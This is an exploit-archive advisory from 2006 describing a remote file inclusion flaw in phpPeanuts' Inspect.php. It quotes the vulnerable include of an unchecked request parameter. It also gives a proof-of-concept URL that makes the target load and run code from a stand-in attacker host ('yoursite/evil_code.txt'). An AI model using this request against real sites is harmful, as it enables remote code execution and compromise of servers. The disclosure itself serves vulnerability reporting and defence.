phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability
# Published : 2006-11-14
# Author : Hidayat Sagita
# Previous Title : Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities
# Next Title : ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability

.:: Preface ::.

Type     : Remote File Include
Scripts     : Phppeanuts 1.1
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip
Founder  : Hidayat Sagita aka bomm_3x
Contact  : hidayat.sagita[at]gmail[dot]com

.:: What ? ::.

In Inspect.php file on line :

4. if ( isSet($_REQUEST["Include"]) )
5.     include $_REQUEST["Include"];

Variable "Include" not verified first before being used.

.:: Proof Of Concept ::.

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?

.:: Shoutz ::.

eCHo staff, az001 and All newbz.

# www.Syue.com [2006-11-14]